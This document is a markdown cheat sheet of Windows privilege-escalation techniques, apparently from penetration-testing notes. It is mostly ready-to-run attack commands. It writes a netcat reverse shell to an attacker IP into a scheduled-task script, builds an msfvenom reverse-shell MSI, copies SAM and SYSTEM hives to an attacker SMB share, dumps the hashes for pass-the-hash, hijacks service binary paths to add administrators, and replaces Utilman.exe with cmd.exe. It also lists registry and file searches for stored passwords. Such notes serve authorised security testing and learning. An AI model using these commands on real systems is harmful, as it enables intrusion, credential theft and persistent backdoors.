# Windows Privilege Escalation

## Links
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)
* [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
* [privescheck](https://github.com/itm4n/PrivescCheck)
* [windows exploit suggester](https://github.com/bitsadmin/wesng)

## Account Types

* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__, local system, final escalation
* __Local Service__, got anonymous connections over network.
* __Network Service__, default service account, authentication via network
## Enumeration

### Users & Groups
```sh
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta
```

### Files

* [powershell](../../../../enumeration/windows/powershell.md)

### System
```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
* Installed software
```sh
wmic product get name,version,vendor
```
* Services
```sh
wmic service list brief | findstr  "Running"
```

## Exploit

### DLL Hijacking
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)

### Token Impersonation
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
*  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/potatoes.md)
* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)

### Schedules Tasks

* `schtasks` and `schtasks /query /tn %TASK_NAME% /fo list /v`
* `Autoruns64.exe`

### MSI Elevated Installer

* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

### Search for Credentials
```sh
cmdkey /list
```
* Use found credentials
```sh
runas /savecred /user:<user> reverse_shell.exe
```
* Keys containing passwords
```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### accesschk64 Permissions
* Check access to files and folders
```sh
accesschk64 -wvu "file.exe"
```
* If permission `SERVICE_CHANGE_CONFIG` is set
```sh
 sc config <service> binpath="net localgroup administrators user /add"
```
* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.

#### accesschk64 for Services
```sh
accesschk64 -qlc "service.exe"
```
* If permission `SERVICE_ALL_ACCESS` is set it is configurable upload a reverse shell
```sh
icacls C:\Windows\Temp\shell.exe /grant Everyone:F
```
* Reconfigure and restart service
```sh
sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService
```

### Startup Application
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`  

### Password Mining
* Set up metasploit
```sh
use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass
```
* Visit site on target

### Unattended Windows Installation

* Investigate the following paths to potentially find user credentials
```sh
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```
* Watch out for the `<Credentials>` tags

### Powershell History file

```sh
Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

### Internet Information Services (IIS)

* Default web server on windows
* Paths containing credentials are the following
```sh
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```

### Putty 

* Saved proxy password credentials may be found via
```sh
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s
```

### schtask and icacls

* Check `schtasks /query /tn %TASK_NAME% /fo list /v`
* Check script for scheduled tasks, `F` means full access
```sh
icacls <PathToScript>
```
* Put payload inside the script
```sh
echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > <PathToSript>
```
* Run the task
```sh
schtasks /run /tn <taskname>
```

### Always Installs Elevated

* These should be set
```sh
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```

* Craft `*.msi` file with a payload
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi
```

* Upload and execute via
```sh
msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi
```

### Service Misconfiguration

* Check services, watch out for `BINARY_PATH_NAME` and `SERVICE_START_NAME`
```sh
sc qc apphostsvc
```
* Check found permissions via
```sh
icacls <BINARY_PATH_NAME>
```
* If the service binary path is writeable move the payload to its path and grant permissions
```sh
icacls <Payload_Service.exe> /grant Everyone:F
```
```sh
sc stop <service>
sc start <service>
```
* Catch the reverse shell service

Others ways are:
* Discretionary Access Control (DACL) can be opened via right click on the service and go to properties
* All services are stored under `HKLM\SYSTEM\CurrentControlSet\Services\`

### Unquoted Service Path

* If `BINARY_PATH_NAME` spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.
* A created directory at install time inherits the permissions from its parent. Check it via
```sh
icacls <directory>
```
* Use `service-exe` payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path
* Set permissions
```sh
icacls C:\Path/to/service.exe /grant Everyone:F
```

### Permissions

* [priv2admin](https://github.com/gtworek/Priv2Admin)
* `whoami /priv`

#### SeBackup / Restore
* If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened
* Download `SAM` and `System` hashes
```sh
reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam    C:\Windows\Temp\sam.hive
```
* Start smb server on attack machine
```sh
copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
```
* Dump the hashes
```sh
secretsdump.py -sam sam.hive -system system.hive LOCAL
```
* Use pass the hash to login 
```sh
psexec.py -hashes <hash> administrator@$TARGET_IP
```

#### SeTakeOwnership
* If `SeTakeOwnership` is set one can take ownership of every file or service.
```sh
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant <user>:F
copy cmd.exe utilman.exe
```
* Log out, on the Login screen click on `Ease of Access`

#### SeImpersonate / SeAssignPrimaryToken

* Execute process as another user